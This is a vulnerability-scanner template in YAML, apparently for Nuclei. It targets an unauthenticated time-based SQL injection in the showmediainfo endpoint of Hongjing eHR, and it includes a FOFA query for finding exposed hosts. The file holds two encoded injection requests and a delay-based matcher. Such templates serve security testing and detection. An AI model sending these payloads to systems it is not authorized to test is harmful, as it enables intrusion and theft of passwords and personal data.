id: hongjingeHR-showmediainfo-sql

info:
  name: 宏景eHR showmediainfo SQL注入漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: app="HJSOFT-HCM"
    宏景eHR showmediainfo接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247488210&idx=1&sn=446aa0fe9efd03a68481e7f55b4c6cb4&chksm=c267a7e1f5102ef7a5f4d83a2ac2d54b01bbf177fcbe3946f9357e501eff7a1b78c15619a41f&token=350950895&lang=zh_CN#rd
  tags: sql injection



http:
  - raw:
      - |
        GET /workbench/duty/showmediainfo?kind=0&usernumber=1MV8sCtnMcsZFzLhJXUMPAATTP2HJFPAATTPeSQjnxB2B6PAATTP2HJBPAATTPqs9424imL40PAATTP3HJDPAATTP&planid=1&objectid=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

      - |
        GET /workbench/duty/showmediainfo?kind=0&usernumber=1MV8sCtnMcsZFzLhJXUMPAATTP2HJFPAATTPXBolUjMO1ICWZlYOtV8xykPAATTP3HJDPAATTP&planid=1&objectid=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and  






